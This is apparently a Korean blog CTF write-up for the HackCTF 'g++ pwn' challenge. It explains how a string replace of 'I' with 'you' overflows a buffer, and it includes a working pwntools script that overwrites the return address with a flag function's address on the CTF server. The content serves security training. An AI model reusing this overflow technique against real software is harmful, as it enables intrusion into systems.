-
[HackCTF : Pwnable] g++ pwn (200p)Wargame/HackCTF 2021. 11. 15. 17:31
[HackCTF : Pwnable] g++ pwn (200p)
g++ pwn checksec 입력받고 출력해준다.
main vuln()이 실행됨
vuln fgets로 입력받는데 32byte를 받기 때문에 bof가 안 터지는데 replace를 통해
I를 you로 바꿔주기 때문에 ret를 건드릴 수 있다.
fgets 0x3c에 입력을 받기 때문에 0x3c + 0x4 [sfp] 만큼 덮어주면 된다.
get_flag 그리고 get_flag 주소를 넣어주면됨
123456789101112from pwn import *#p = process("./gpwn")p = remote("ctf.j0n9hyun.xyz",3011)flag = 0x08048f0dpayload = "I"*20payload += "A"*4payload += p32(flag)p.sendline(payload)p.interactive()cs exploit good
'Wargame > HackCTF' 카테고리의 다른 글
[HackCTF : Pwnable] Gift(250p) (0) 2021.11.26 [HackCTF : Pwnable] 1996 (200p) (0) 2021.11.25 [HackCTF : Pwnable] ROP (300p) (0) 2021.08.31 [HackCTF : Pwnable] Yes or no (150p) (0) 2021.08.30 [HackCTF : Pwnable] Random Key (200p) (0) 2021.07.12
